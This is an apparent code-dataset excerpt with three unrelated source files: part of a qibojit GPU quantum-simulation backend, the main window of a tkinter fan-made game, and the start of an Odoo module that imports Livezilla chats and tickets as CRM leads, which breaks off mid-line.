block_size\n if nstates < block_size:\n nblocks = 1\n block_size = nstates\n return nblocks, block_size\n\n def one_qubit_base(self, state, nqubits, target, kernel, gate, qubits):\n ncontrols = len(qubits) - 1 if qubits is not None else 0\n m = nqubits - target - 1\n tk = 1 << m\n nstates = 1 << (nqubits - ncontrols - 1)\n if kernel in (\"apply_x\", \"apply_y\", \"apply_z\"):\n args = (state, tk, m)\n else:\n args = (state, tk, m, gate)\n\n if ncontrols:\n kernel = self.gates.get(f\"multicontrol_{kernel}_kernel_{self.kernel_type}\")\n args += (qubits, ncontrols + 1)\n else:\n kernel = self.gates.get(f\"{kernel}_kernel_{self.kernel_type}\")\n\n nblocks, block_size = self.calculate_blocks(nstates)\n kernel((nblocks,), (block_size,), args)\n self.cp.cuda.stream.get_current_stream().synchronize()\n return state\n\n def two_qubit_base(self, state, nqubits, target1, target2, kernel, gate, qubits):\n ncontrols = len(qubits) - 2 if qubits is not None else 0\n if target1 > target2:\n m1 = nqubits - target1 - 1\n m2 = nqubits - target2 - 1\n tk1, tk2 = 1 << m1, 1 << m2\n uk1, uk2 = tk2, tk1\n else:\n m1 = nqubits - target2 - 1\n m2 = nqubits - target1 - 1\n tk1, tk2 = 1 << m1, 1 << m2\n uk1, uk2 = tk1, tk2\n nstates = 1 << (nqubits - 2 - ncontrols)\n\n if kernel == \"apply_swap\":\n args = (state, tk1, tk2, m1, m2, uk1, uk2)\n else:\n args = (state, tk1, tk2, m1, m2, uk1, uk2, gate)\n assert state.dtype == args[-1].dtype\n\n if ncontrols:\n kernel = self.gates.get(f\"multicontrol_{kernel}_kernel_{self.kernel_type}\")\n args += (qubits, ncontrols + 2)\n else:\n kernel = self.gates.get(f\"{kernel}_kernel_{self.kernel_type}\")\n\n nblocks, block_size = self.calculate_blocks(nstates)\n kernel((nblocks,), (block_size,), args)\n self.cp.cuda.stream.get_current_stream().synchronize()\n return state\n\n def multi_qubit_base(self, state, nqubits, targets, gate, qubits):\n assert gate is not None\n if qubits is None:\n qubits = self.cast(\n sorted(nqubits - q - 1 for q in targets), dtype=self.cp.int32\n )\n ntargets = len(targets)\n if ntargets > self.MAX_NUM_TARGETS:\n raise ValueError(\n f\"Number of target qubits must be <= {self.MAX_NUM_TARGETS}\"\n f\" but is {ntargets}.\"\n )\n nactive = len(qubits)\n targets = self.cp.asarray(\n tuple(1 << (nqubits - t - 1) for t in targets[::-1]), dtype=self.cp.int64\n )\n nstates = 1 << (nqubits - nactive)\n nsubstates = 1 << ntargets\n nblocks, block_size = self.calculate_blocks(nstates)\n kernel = self.gates.get(\n f\"apply_multi_qubit_gate_kernel_{self.kernel_type}_{ntargets}\"\n )\n args = (state, gate, qubits, targets, ntargets, nactive)\n kernel((nblocks,), (block_size,), args)\n self.cp.cuda.stream.get_current_stream().synchronize()\n return state\n\n def _create_qubits_tensor(self, gate, nqubits):\n qubits = super()._create_qubits_tensor(gate, nqubits)\n return self.cp.asarray(qubits, dtype=self.cp.int32)\n\n def _as_custom_matrix(self, gate):\n matrix = super()._as_custom_matrix(gate)\n return self.cp.asarray(matrix.ravel())\n\n # def apply_gate(self, gate, state, nqubits): Inherited from ``NumbaBackend``\n\n # def apply_gate_density_matrix(self, gate, state, nqubits, inverse=False): Inherited from ``NumbaBackend``\n\n # def _apply_ygate_density_matrix(self, gate, state, nqubits): Inherited from ``NumbaBackend``\n\n # def apply_channel(self, gate): Inherited from ``NumbaBackend``\n\n # def apply_channel_density_matrix(self, channel, state, nqubits): Inherited from ``NumbaBackend``\n\n def collapse_state(self, state, qubits, shot, nqubits, normalize=True):\n ntargets = len(qubits)\n nstates = 1 << (nqubits - ntargets)\n nblocks, block_size = self.calculate_blocks(nstates)\n\n state = self.cast(state)\n qubits = self.cast(\n [nqubits - q - 1 for q in reversed(qubits)], dtype=self.cp.int32\n )\n args = [state, qubits, int(shot), ntargets]\n kernel = self.gates.get(f\"collapse_state_kernel_{self.kernel_type}\")\n kernel((nblocks,), (block_size,), args)\n self.cp.cuda.stream.get_current_stream().synchronize()\n\n if normalize:\n norm = self.cp.sqrt(self.cp.sum(self.cp.square(self.cp.abs(state))))\n state = state / norm\n return state\n\n # def collapse_density_matrix(self, state, qubits, shot, nqubits, normalize=True): Inherited from ``NumbaBackend``\n\n # def reset_error_density_matrix(self, gate, state, nqubits): Inherited from ``NumpyBackend``\n\n def execute_distributed_circuit(\n self, circuit, initial_state=None, nshots=None, return_array=False\n ):\n import joblib\n from qibo.gates import M\n from qibo.states import CircuitResult\n\n if not circuit.queues.queues:\n circuit.queues.set(circuit.queue)\n\n try:\n cpu_backend = NumbaBackend()\n cpu_backend.set_precision(self.precision)\n ops = MultiGpuOps(self, cpu_backend, circuit)\n\n if initial_state is None:\n # Generate pieces for |000...0> state\n pieces = [cpu_backend.zero_state(circuit.nlocal)]\n pieces.extend(\n np.zeros(2**circuit.nlocal, dtype=self.dtype)\n for _ in range(circuit.ndevices - 1)\n )\n elif isinstance(initial_state, CircuitResult):\n # TODO: Implement this\n if isinstance(initial_state.execution_result, list):\n pieces = initial_state.execution_result\n else:\n pieces = ops.to_pieces(initial_state.state())\n elif isinstance(initial_state, self.tensor_types):\n pieces = ops.to_pieces(initial_state)\n else:\n raise_error(\n TypeError,\n \"Initial state type {} is not supported by \"\n \"distributed circuits.\".format(type(initial_state)),\n )\n for gate in circuit.queue:\n if isinstance(gate, M):\n gate.result.backend = CupyBackend()\n special_gates = iter(circuit.queues.special_queue)\n for i, queues in enumerate(circuit.queues.queues):\n if queues: # standard gate\n config = circuit.queues.device_to_ids.items()\n pool = joblib.Parallel(n_jobs=circuit.ndevices, prefer=\"threads\")\n pool(\n joblib.delayed(ops.apply_gates)(pieces, queues, ids, device)\n for device, ids in config\n )\n\n else: # special gate\n gate = next(special_gates)\n if isinstance(gate, tuple): # SWAP global-local qubit\n global_qubit, local_qubit = gate\n pieces = ops.swap(pieces, global_qubit, local_qubit)\n else:\n pieces = ops.apply_special_gate(pieces, gate)\n\n for gate in special_gates: # pragma: no cover\n pieces = ops.apply_special_gate(pieces, gate)\n\n if return_array:\n return ops.to_tensor(pieces)\n else:\n circuit._final_state = CircuitResult(self, circuit, pieces, nshots)\n return circuit._final_state\n\n except self.oom_error:\n raise_error(\n RuntimeError,\n \"State does not fit in memory during distributed \"\n \"execution. Please create a new circuit with \"\n \"different device configuration and try again.\",\n )\n\n def circuit_result_tensor(self, result):\n if isinstance(result.execution_result, list):\n # transform distributed state pieces to tensor\n ops = MultiGpuOps(self, NumbaBackend(), result.circuit)\n return ops.to_tensor(result.execution_result)\n else:\n return super().circuit_result_tensor(result)\n\n # def calculate_symbolic(self, state, nqubits, decimals=5, cutoff=1e-10, max_terms=20): Inherited from ``NumpyBackend``\n\n # def calculate_symbolic_density_matrix(self, state, nqubits, decimals=5, cutoff=1e-10, max_terms=20): Inherited from ``NumpyBackend``\n\n def calculate_probabilities(self, state, qubits, nqubits):\n try:\n probs = super().calculate_probabilities(state, qubits, nqubits)\n except MemoryError:\n # fall back to CPU\n probs = super().calculate_probabilities(\n self.to_numpy(state), qubits, nqubits\n )\n return probs\n\n def sample_shots(self, probabilities, nshots):\n # Sample shots on CPU\n probabilities = self.to_numpy(probabilities)\n return super().sample_shots(probabilities, nshots)\n\n # def aggregate_shots(self, shots): Inherited from ``NumpyBackend``\n\n # def samples_to_binary(self, samples, nqubits): Inherited from ``NumpyBackend``\n\n # def samples_to_decimal(self, samples, nqubits): Inherited from ``NumpyBackend``\n\n def sample_frequencies(self, probabilities, nshots):\n # Sample frequencies on CPU\n probabilities = self.to_numpy(probabilities)\n return super().sample_frequencies(probabilities, nshots)\n\n # def calculate_frequencies(self, samples): Inherited from ``NumpyBackend``\n\n # def assert_allclose(self, value, target, rtol=1e-7, atol=0.0): Inherited from ``NumpyBackend``\n\n def calculate_expectation_state(self, matrix, state, normalize):\n state = self.cast(state)\n statec = self.cp.conj(state)\n hstate = matrix @ state\n ev = self.cp.real(self.cp.sum(statec * hstate))\n if normalize:\n norm = self.cp.sum(self.cp.square(self.cp.abs(state)))\n ev = ev / norm\n return ev\n\n def calculate_expectation_density_matrix(self, matrix, state, normalize):\n state = self.cast(state)\n ev = self.cp.real(self.cp.trace(matrix @ state))\n if normalize:\n norm = self.cp.real(self.cp.trace(state))\n ev = ev / norm\n return ev\n\n def calculate_eigenvalues(self, matrix, k=6):\n if self.issparse(matrix):\n log.warning(\n \"Calculating sparse matrix eigenvectors because \"\n \"sparse modules do not provide ``eigvals`` method.\"\n )\n return self.calculate_eigenvectors(matrix, k=k)[0]\n return self.cp.linalg.eigvalsh(matrix)\n\n def calculate_eigenvectors(self, matrix, k=6):\n if self.issparse(matrix):\n if k < matrix.shape[0]:\n # Fallback to numpy because cupy's ``sparse.eigh`` does not support 'SA'\n from scipy.sparse.linalg import eigsh # pylint: disable=import-error\n\n result = eigsh(matrix.get(), k=k, which=\"SA\")\n return self.cast(result[0]), self.cast(result[1])\n matrix = matrix.toarray()\n if self.is_hip:\n # Fallback to numpy because eigh is not implemented in rocblas\n result = self.np.linalg.eigh(self.to_numpy(matrix))\n return self.cast(result[0]), self.cast(result[1])\n else:\n return self.cp.linalg.eigh(matrix)\n\n def calculate_matrix_exp(self, a, matrix, eigenvectors=None, eigenvalues=None):\n if eigenvectors is None or self.issparse(matrix):\n if self.issparse(matrix):\n from scipy.sparse.linalg import expm\n else:\n from scipy.linalg import expm\n return self.cast(expm(-1j * a * matrix.get()))\n else:\n expd = self.cp.diag(self.cp.exp(-1j * a * eigenvalues))\n ud = self.cp.transpose(self.cp.conj(eigenvectors))\n return self.cp.matmul(eigenvectors, self.cp.matmul(expd, ud))\n\n\nclass CuQuantumBackend(CupyBackend): # pragma: no cover\n # CI does not test for GPU\n\n def __init__(self):\n super().__init__()\n import cuquantum # pylint: disable=import-error\n from cuquantum import custatevec as cusv # pylint: disable=import-error\n\n self.cuquantum = cuquantum\n self.cusv = cusv\n self.platform = \"cuquantum\"\n self.versions[\"cuquantum\"] = self.cuquantum.__version__\n self.supports_multigpu = True\n self.handle = self.cusv.create()\n self.custom_matrices = CuQuantumMatrices(self.dtype)\n\n def __del__(self):\n if hasattr(self, \"cusv\"):\n self.cusv.destroy(self.handle)\n\n def set_precision(self, precision):\n if precision != self.precision:\n super().set_precision(precision)\n if self.custom_matrices:\n self.custom_matrices = CuQuantumMatrices(self.dtype)\n\n def get_cuda_type(self, dtype=\"complex64\"):\n if dtype == \"complex128\":\n return (\n self.cuquantum.cudaDataType.CUDA_C_64F,\n self.cuquantum.ComputeType.COMPUTE_64F,\n )\n elif dtype == \"complex64\":\n return (\n self.cuquantum.cudaDataType.CUDA_C_32F,\n self.cuquantum.ComputeType.COMPUTE_32F,\n )\n else:\n raise TypeError(\"Type can be either complex64 or complex128\")\n\n def one_qubit_base(self, state, nqubits, target, kernel, gate, qubits=None):\n ntarget = 1\n target = nqubits - target - 1\n if qubits is not None:\n qubits = self.to_numpy(qubits)\n ncontrols = len(qubits) - 1\n controls = self.np.asarray(\n [i for i in qubits if i != target], dtype=\"int32\"\n )\n else:\n ncontrols = 0\n controls = self.np.empty(0)\n adjoint = 0\n target = self.np.asarray([target], dtype=self.np.int32)\n\n state = self.cast(state)\n gate = self.cast(gate)\n assert state.dtype == gate.dtype\n data_type, compute_type = self.get_cuda_type(state.dtype)\n if isinstance(gate, self.cp.ndarray):\n gate_ptr = gate.data.ptr\n elif isinstance(gate, self.np.ndarray):\n gate_ptr = gate.ctypes.data\n else:\n raise ValueError\n\n workspaceSize = self.cusv.apply_matrix_get_workspace_size(\n self.handle,\n data_type,\n nqubits,\n gate_ptr,\n data_type,\n self.cusv.MatrixLayout.ROW,\n adjoint,\n ntarget,\n ncontrols,\n compute_type,\n )\n\n # check the size of external workspace\n if workspaceSize > 0:\n workspace = self.cp.cuda.memory.alloc(workspaceSize)\n workspace_ptr = workspace.ptr\n else:\n workspace_ptr = 0\n\n self.cusv.apply_matrix(\n self.handle,\n state.data.ptr,\n data_type,\n nqubits,\n gate_ptr,\n data_type,\n self.cusv.MatrixLayout.ROW,\n adjoint,\n target.ctypes.data,\n ntarget,\n controls.ctypes.data,\n 0,\n ncontrols,\n compute_type,\n workspace_ptr,\n workspaceSize,\n )\n\n return state\n\n def two_qubit_base(\n self, state, nqubits, target1, target2, kernel, gate, qubits=None\n ):\n ntarget = 2\n target1 = nqubits - target1 - 1\n target2 = nqubits - target2 - 1\n target = self.np.asarray([target2, target1], dtype=self.np.int32)\n if qubits is not None:\n ncontrols = len(qubits) - 2\n qubits = self.to_numpy(qubits)\n controls = self.np.asarray(\n [i for i in qubits if i not in [target1, target2]], dtype=self.np.int32\n )\n else:\n ncontrols = 0\n controls = self.np.empty(0)\n\n adjoint = 0\n\n state = self.cast(state)\n gate = self.cast(gate)\n\n assert state.dtype == gate.dtype\n data_type, compute_type = self.get_cuda_type(state.dtype)\n\n if kernel == \"apply_swap\":\n nBitSwaps = 1\n bitSwaps = [(target1, target2)]\n maskLen = ncontrols\n maskBitString = self.np.ones(ncontrols)\n maskOrdering = controls\n\n self.cusv.swap_index_bits(\n self.handle,\n state.data.ptr,\n data_type,\n nqubits,\n bitSwaps,\n nBitSwaps,\n maskBitString,\n maskOrdering,\n maskLen,\n )\n return state\n\n if isinstance(gate, self.cp.ndarray):\n gate_ptr = gate.data.ptr\n elif isinstance(gate, self.np.ndarray):\n gate_ptr = gate.ctypes.data\n else:\n raise ValueError\n\n workspaceSize = self.cusv.apply_matrix_get_workspace_size(\n self.handle,\n data_type,\n nqubits,\n gate_ptr,\n data_type,\n self.cusv.MatrixLayout.ROW,\n adjoint,\n ntarget,\n ncontrols,\n compute_type,\n )\n\n # check the size of external workspace\n if workspaceSize > 0:\n workspace = self.cp.cuda.memory.alloc(workspaceSize)\n workspace_ptr = workspace.ptr\n else:\n workspace_ptr = 0\n\n self.cusv.apply_matrix(\n self.handle,\n state.data.ptr,\n data_type,\n nqubits,\n gate_ptr,\n data_type,\n self.cusv.MatrixLayout.ROW,\n adjoint,\n target.ctypes.data,\n ntarget,\n controls.ctypes.data,\n 0,\n ncontrols,\n compute_type,\n workspace_ptr,\n workspaceSize,\n )\n\n return state\n\n def multi_qubit_base(self, state, nqubits, targets, gate, qubits=None):\n state = self.cast(state)\n ntarget = len(targets)\n if qubits is None:\n qubits = sorted(nqubits - q - 1 for q in targets)\n else:\n qubits = self.to_numpy(qubits)\n target = [nqubits - q - 1 for q in targets]\n target = self.np.asarray(target[::-1], dtype=self.np.int32)\n controls = self.np.asarray(\n [i for i in qubits if i not in target], dtype=self.np.int32\n )\n ncontrols = len(controls)\n adjoint = 0\n gate = self.cast(gate)\n assert state.dtype == gate.dtype\n data_type, compute_type = self.get_cuda_type(state.dtype)\n\n if isinstance(gate, self.cp.ndarray):\n gate_ptr = gate.data.ptr\n elif isinstance(gate, self.np.ndarray):\n gate_ptr = gate.ctypes.data\n else:\n raise ValueError\n\n workspaceSize = self.cusv.apply_matrix_get_workspace_size(\n self.handle,\n data_type,\n nqubits,\n gate_ptr,\n data_type,\n self.cusv.MatrixLayout.ROW,\n adjoint,\n ntarget,\n ncontrols,\n compute_type,\n )\n\n # check the size of external workspace\n if workspaceSize > 0:\n workspace = self.cp.cuda.memory.alloc(workspaceSize)\n workspace_ptr = workspace.ptr\n else:\n workspace_ptr = 0\n\n self.cusv.apply_matrix(\n self.handle,\n state.data.ptr,\n data_type,\n nqubits,\n gate_ptr,\n data_type,\n self.cusv.MatrixLayout.ROW,\n adjoint,\n target.ctypes.data,\n ntarget,\n controls.ctypes.data,\n 0,\n ncontrols,\n compute_type,\n workspace_ptr,\n workspaceSize,\n )\n\n return state\n\n def collapse_state(self, state, qubits, shot, nqubits, normalize=True):\n state = self.cast(state)\n results = bin(int(shot)).replace(\"0b\", \"\")\n results = list(map(int, \"0\" * (len(qubits) - len(results)) + results))[::-1]\n ntarget = 1\n qubits = self.np.asarray(\n [nqubits - q - 1 for q in reversed(qubits)], dtype=\"int32\"\n )\n data_type, compute_type = self.get_cuda_type(state.dtype)\n\n for i in range(len(results)):\n self.cusv.collapse_on_z_basis(\n self.handle,\n state.data.ptr,\n data_type,\n nqubits,\n results[i],\n [qubits[i]],\n ntarget,\n 1,\n )\n\n if normalize:\n norm = self.cp.sqrt(self.cp.sum(self.cp.square(self.cp.abs(state))))\n state = state / norm\n\n return state\n\n\nclass MultiGpuOps: # pragma: no cover\n # CI does not have GPUs\n\n def __init__(self, backend, cpu_backend, circuit):\n self.backend = backend\n self.circuit = circuit\n self.cpu_ops = cpu_backend.ops\n\n def transpose_state(self, pieces, state, nqubits, order):\n original_shape = state.shape\n state = state.ravel()\n # always fall back to numba CPU backend because for ops not implemented on GPU\n state = self.cpu_ops.transpose_state(tuple(pieces), state, nqubits, order)\n return np.reshape(state, original_shape)\n\n def to_pieces(self, state):\n nqubits = self.circuit.nqubits\n qubits = self.circuit.queues.qubits\n shape = (self.circuit.ndevices, 2**self.circuit.nlocal)\n state = np.reshape(self.backend.to_numpy(state), shape)\n pieces = [state[i] for i in range(self.circuit.ndevices)]\n new_tensor = np.zeros(shape, dtype=state.dtype)\n new_tensor = self.transpose_state(\n pieces, new_tensor, nqubits, qubits.transpose_order\n )\n for i in range(self.circuit.ndevices):\n pieces[i] = new_tensor[i]\n return pieces\n\n def to_tensor(self, pieces):\n nqubits = self.circuit.nqubits\n qubits = self.circuit.queues.qubits\n if qubits.list == list(range(self.circuit.nglobal)):\n tensor = np.concatenate([x[np.newaxis] for x in pieces], axis=0)\n tensor = np.reshape(tensor, (2**nqubits,))\n elif qubits.list == list(range(self.circuit.nlocal, self.circuit.nqubits)):\n tensor = np.concatenate([x[:, np.newaxis] for x in pieces], axis=1)\n tensor = np.reshape(tensor, (2**nqubits,))\n else: # fall back to the transpose op\n tensor = np.zeros(2**nqubits, dtype=self.backend.dtype)\n tensor = self.transpose_state(\n pieces, tensor, nqubits, qubits.reverse_transpose_order\n )\n return tensor\n\n def apply_gates(self, pieces, queues, ids, device):\n \"\"\"Method that is parallelized using ``joblib``.\"\"\"\n for i in ids:\n device_id = int(device.split(\":\")[-1]) % self.backend.ngpus\n with self.backend.cp.cuda.Device(device_id):\n piece = self.backend.cast(pieces[i])\n for gate in queues[i]:\n piece = self.backend.apply_gate(gate, piece, self.circuit.nlocal)\n pieces[i] = self.backend.to_numpy(piece)\n del piece\n\n def apply_special_gate(self, pieces, gate):\n \"\"\"Executes special gates on CPU.\n\n Currently special gates are ``Flatten`` or ``CallbackGate``.\n This method calculates the full state vector because special gates\n are not implemented for state pieces.\n \"\"\"\n from qibo.gates import CallbackGate\n\n # Reverse all global SWAPs that happened so far\n pieces = self.revert_swaps(pieces, reversed(gate.swap_reset))\n state = self.to_tensor(pieces)\n if isinstance(gate, CallbackGate):\n gate.apply(self.backend, state, self.circuit.nqubits)\n else:\n state = gate.apply(self.backend, state, self.circuit.nqubits)\n pieces = self.to_pieces(state)\n # Redo all global SWAPs that happened so far\n pieces = self.revert_swaps(pieces, gate.swap_reset)\n return pieces\n\n def swap(self, pieces, global_qubit, local_qubit):\n m = self.circuit.queues.qubits.reduced_global.get(global_qubit)\n m = self.circuit.nglobal - m - 1\n t = 1 << m\n for g in range(self.circuit.ndevices // 2):\n i = ((g >> m) << (m + 1)) + (g & (t - 1))\n local_eff = self.circuit.queues.qubits.reduced_local.get(local_qubit)\n self.cpu_ops.swap_pieces(\n pieces[i], pieces[i + t], local_eff, self.circuit.nlocal\n )\n return pieces\n\n def revert_swaps(self, pieces, swap_pairs):\n for q1, q2 in swap_pairs:\n if q1 not in self.circuit.queues.qubits.set:\n q1, q2 = q2, q1\n pieces = self.swap(pieces, q1, q2)\n return pieces\n","sub_path":"src/qibojit/backends/gpu.py","file_name":"gpu.py","file_ext":"py","file_size_in_byte":32314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"413245795","text":"from tkinter import *\nimport tkinter\n# import scene.scene_game as game_scene\nimport scene.scene_init as init_scene\nimport globe\nimport time\n\n\nclass MainWindow:\n \"\"\"\n SUMMARY:\n The main game window, for carrying all different scenes\n\n Attributes:\n self.window Define tkinter window objecct\n self.window.title Set the title of the window\n self.activescene Initialize the scene which is updated & displayed inside the window\n self.stack Initialize the scene stack for rapid scene switching\n \"\"\"\n\n def __init__(self):\n self.window = tkinter.Tk()\n self.window.title(\n \"東方靈異伝 ~ Highly Responsive to Prayers [FanMade Version]\")\n self.window.resizable(0, 0)\n self.window.iconphoto(True, PhotoImage(file=\"asset/icon.gif\"))\n self.window.configure(background='black')\n\n self.activescene = None\n self.stack = []\n\n def coldstart(self, scene):\n \"\"\"\n DESCRIPTION:\n start one specific scene inside the window for the first time\n\n Args:\n scene: The scene to be started\n\n Return:\n None\n \"\"\"\n self.stack.append(scene)\n self.activescene = scene\n self.activescene.extpause(1)\n\n def switch(self, scene, arg=None, arg1=None):\n \"\"\"\n DESCRIPTION:\n switch from one scene to another. WARNING: Will kill old one,\n save all relevent states before switching\n\n\n Args:\n scene: The destination scene to be switched to\n arg: conditional data passing\n arg1: conditional data passing\n \"\"\"\n self.activescene.extpause(0) # Pause the current scene\n self.stack.append(scene) # Append destination scene into the stack\n # Remove all objects on the canvas, do NOT preserve states\n self.activescene.canvas.destroy()\n\n # Set activescene to destionation scene\n self.activescene = scene.Scene(self.window, arg, arg1)\n time.sleep(0.1)\n self.activescene.extpause(1)\n\n def run(self):\n \"\"\"\n DESCRIPTION:\n run the main window framework\n\n Args:\n /\n \"\"\"\n self.coldstart(init_scene.Scene(self.window, None)) # coldstart init scene\n\n while True: # go into while loop for scene updates\n self.activescene.update()\n\n @staticmethod\n def kill():\n \"\"\"\n DESCRIPTION:\n kill the program\n\n Args:\n /\n \"\"\"\n globe.window.window.destroy()\n\n\nglobe.ispause = False\n# Instanciate MainWindow class, set & initialize window\nglobe.window = MainWindow()\nglobe.window.run() # Call function run(), start running init_scene\nglobe.window.window.mainloop() # tkinter mainloop\n","sub_path":"Game-1280*720(no line length limit)/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"87776201","text":"# -*- coding: utf-8 -*-\nimport logging\nimport hashlib\nimport datetime\nimport time\nimport requests\nimport pytz\nfrom openerp import models, api\nfrom .settings import LIVEZILLA_TICKET_PARAM_KEY, LIVEZILLA_CHAT_PARAM_KEY, LIVEZILLA_API_URL_PARAM_KEY, LIVEZILLA_API_USERNAME_PARAM_KEY, LIVEZILLA_API_PASSWORD_PARAM_KEY, LIVEZILLA_TIMEZONE_PARAM_KEY\nfrom ..lib import livezilla\n\n__author__ = 'Rui Coelho'\n_logger = logging.getLogger(__name__)\ntz = 'Europe/Lisbon'\n\n_LEAD_ORIGIN_CHAT_REF = 'pdf_crm_extensions.product_origin_chat'\n_LEAD_ORIGIN_TICKET_REF = 'pdf_crm_extensions.product_origin_ticket'\nLEAD_NAME_STR_FORMAT = u'Chat #{0} | {1}'\nTICKET_NAME_STR_FORMAT = u'Ticket #{0} | {1}'\n\n\nclass pdf_external_leads_livezilla(models.TransientModel):\n \"\"\"\n Livezilla\n \"\"\"\n _name = 'pdf_external_leads.livezilla'\n _inherit = ['automatic.leads.mixin']\n\n def _get_livezilla_connector(self):\n url = self.env['ir.config_parameter'].get_param(LIVEZILLA_API_URL_PARAM_KEY)\n username = self.env['ir.config_parameter'].get_param(LIVEZILLA_API_USERNAME_PARAM_KEY)\n password = self.env['ir.config_parameter'].get_param(LIVEZILLA_API_PASSWORD_PARAM_KEY)\n timezone = self.env['ir.config_parameter'].get_param(LIVEZILLA_TIMEZONE_PARAM_KEY)\n connector = livezilla.Connector(requests, url, username, password, timezone)\n return connector\n\n @staticmethod\n def extract_leads_from_tickets(tickets):\n \"\"\"\n Extract info from list of chats to be converted into odoo leads\n :param tickets: list of tickets\n :type tickets: list\n :returns: list of information for leads\n :rtype: list\n \"\"\"\n _logger.info('Extracting info from % i tickets to create leads', len(tickets))\n result = []\n leads_index = []\n for item in tickets: # type: dict\n ticket = item['Ticket']\n ticket_message = ticket['Messages'][0]['TicketMessage']\n\n similarity_key = u'{0}|{1}|{2}|{3}'.format(ticket_message['Fullname'], ticket_message['Phone'], ticket_message['Email'], ticket['Group'])\n digest = hashlib.md5(similarity_key.encode('ascii', 'backslashreplace')).hexdigest()\n if digest not in leads_index:\n leads_index.append(digest)\n real_estate_reference = None\n if 'Customs' in ticket_message and 'Imovel' in ticket_message['Customs']:\n real_estate_reference = ticket_message['Customs']['Imovel']\n\n result.append({'name': TICKET_NAME_STR_FORMAT.format(unicode(ticket_message['TicketId']), unicode(ticket_message['Fullname'])),\n 'description': unicode(ticket_message['Subject'] + '\\n' + ticket_message['Text']),\n 'contact_name': unicode(ticket_message['Fullname']),\n 'contact_phone': unicode(ticket_message['Phone']),\n 'contact_email': unicode(ticket_message['Email']),\n 'group': unicode(ticket['Group']),\n 'product_code': real_estate_reference})\n else:\n similar_ticket_index = leads_index.index(digest)\n result[similar_ticket_index]['description'] += '\\n' + 20 * '-' + '\\n' + unicode(ticket_message['Subject']) + '\\n' + unicode(ticket_message['Text'])\n\n return result\n\n @staticmethod\n def extract_leads_from_chats(chats):\n \"\"\"\n Extract info from list of chats to be converted into odoo leads\n :param chats: list of chats\n :type chats: list\n :returns: list of information for leads\n :rtype: list\n \"\"\"\n _logger.info('Extracting info from % i chats to create leads', len(chats))\n result = []\n leads_index = []\n for item in chats:\n chat = item['Chat']\n\n if 'Operator' not in chat:\n continue\n\n similarity_key = u'{0}|{1}|{2}|{3}'.format(chat['Fullname'], chat['Phone'], chat['Email'], chat['OperatorId'])\n digest = hashlib.md5(similarity_key.encode('ascii', 'backslashreplace')).hexdigest()\n if digest not in leads_index:\n leads_index.append(digest)\n real_estate_reference = None\n if 'Customs' in chat and 'Imovel' in chat['Customs']:\n real_estate_reference = chat['Customs']['Imovel']\n result.append({'name': LEAD_NAME_STR_FORMAT.format(unicode(chat['ChatId']), unicode(chat['Fullname'])), 'description': unicode(chat['Question']) + '\\n' + unicode(chat['PlainText']), 'operator': unicode(chat['Operator'].email), 'contact_name': unicode(chat['Fullname']), 'contact_phone': unicode(chat['Phone']), 'contact_email': unicode(chat['Email']), 'group': unicode(chat['Group']), 'product_code': real_estate_reference})\n else:\n similar_chat_index = leads_index.index(digest)\n result[similar_chat_index]['description'] += '\\n' + 20 * '-' + '\\n' + unicode(chat['Question']) + '\\n' + unicode(chat['PlainText'])\n\n return result\n\n @staticmethod\n def extract_contacts_from_tickets(tickets):\n \"\"\"\n Extract contact info from a list of tickets\n :param tickets: list of tickets\n :type tickets: list\n :returns: list of contact information\n :rtype: list\n \"\"\"\n _logger.info('Extracting contacts from %i tickets', len(tickets))\n result = []\n for ticket in tickets: # type: dict\n _logger.debug(ticket)\n ticket_message = ticket['Ticket']['Messages'][0]['TicketMessage'] # type: dict\n result.append({'name': unicode(ticket_message['Fullname']), 'phone': unicode(ticket_message['Phone']), 'email': unicode(ticket_message['Email']), 'lang': unicode(ticket['Ticket']['Language']), 'group': unicode(ticket['Ticket']['Group'])})\n\n return result\n\n @staticmethod\n def extract_contacts_from_chats(chats):\n \"\"\"\n Extract contact info from a list of chats\n :param chats: list of chats\n :type chats: list\n :returns: list of contact information\n :rtype: list\n \"\"\"\n _logger.info('Extracting contacts from %i chats', len(chats))\n result = []\n for item in chats: # type: dict\n _logger.debug(item)\n chat = item['Chat']\n result.append({'name': chat['Fullname'], 'phone': chat['Phone'], 'email': chat['Email'], 'lang': chat['Language'], 'group': chat['Group']})\n\n return result\n\n def create_or_update_contacts(self, contacts, origin):\n \"\"\"\n Creates contacts or updates an existing contacts in odoo.\n :param contacts: List of contact information\n :param origin: Origin of the contact ('chat' | 'ticket')\n :return: True on success\n \"\"\"\n _logger.info('Creating or updating contacts from %i contacts', len(contacts))\n for contact in contacts:\n if not contact['phone'] and not contact['email']:\n _logger.warning('Skipping %s because it contains no email and phone', contact)\n continue\n\n name = contact['name']\n phone = contact['phone']\n email = contact['email']\n group_name = contact['group']\n origin_ref_str = 'pdf_crm_extensions.product_origin_' + origin\n if group_name:\n # product_origin_chat_vendas_lisboa\n origin_ref_str += '_' + group_name.lower().replace(' ', '_')\n origin_id = self.env.ref(origin_ref_str).id\n self.env['res.partner'].create_or_update(name, phone, email, origin_id)\n return True\n\n def fetch_tickets(self, timestamp_since):\n \"\"\"\n Retrieve tickets from livezilla\n :param timestamp_since: fetch tickets created afer this (unix timestamp)\n :return: list of tickets\n \"\"\"\n lz = self._get_livezilla_connector()\n datetime_since = datetime.datetime.fromtimestamp(float(timestamp_since), tz=pytz.utc)\n _logger.info('Retrieving tickets since %s', datetime_since.astimezone(pytz.timezone(tz)))\n tickets = lz.get_tickets(datetime_since, [livezilla.TicketStatus.OPEN, livezilla.TicketStatus.CLOSED, livezilla.TicketStatus.IN_PROGRESS])\n _logger.info('Retrieved %i tickets', len(tickets))\n\n for item in tickets:\n ticket = item['Ticket']\n ticket['TimestampCreated'] = ticket['Messages'][0]['TicketMessage']['Edited']\n\n return tickets\n\n def fetch_chats(self, timestamp_since):\n \"\"\"\n Retrieve chats from livezilla\n :param timestamp_since: fetch chats created afer this (unix timestamp)\n :return: list of chats\n \"\"\"\n lz = self._get_livezilla_connector()\n datetime_since = datetime.datetime.fromtimestamp(float(timestamp_since), tz=pytz.utc)\n _logger.info('Retrieving chats since %s', datetime_since.astimezone(pytz.timezone(tz)))\n chats = lz.get_chats(datetime_since)\n _logger.info('Retrieved %i chats', len(chats))\n\n # TODO: cache operator info\n for item in chats: # type: dict\n chat = item['Chat']\n chat_operator_id = 